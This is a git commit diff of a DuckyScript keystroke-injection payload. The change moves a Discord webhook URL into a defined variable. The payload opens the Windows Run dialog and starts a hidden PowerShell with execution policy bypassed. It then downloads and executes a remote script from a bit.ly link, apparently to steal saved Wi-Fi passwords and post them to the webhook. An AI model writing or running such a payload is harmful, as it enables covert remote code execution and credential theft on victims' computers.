Defined Discord Webhook

pull/208/head
Alessandro 2023-01-11 08:58:31 +01:00 committed by GitHub
parent 8a5679a9e4
commit dfca1ced37
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 1 deletions

View File

@ -38,7 +38,12 @@ REM And it will be sent to '$discord' wehbook with the Json object '$Body' a
REM Requirements:
REM - Nothing
REM REQUIRED - Provide Discord Webhook
DEFINE #z YOUR-DISCORD-WEBHOOK
DELAY 2000
GUI r
DELAY 250
STRINGLN powershell -w h -ep bypass $discord='';irm bit.ly/WLAN-Windows-Password | iex
STRING powershell -w h -ep bypass $discord='
STRING #z
STRINGLN ';irm bit.ly/WLAN-Windows-Password | iex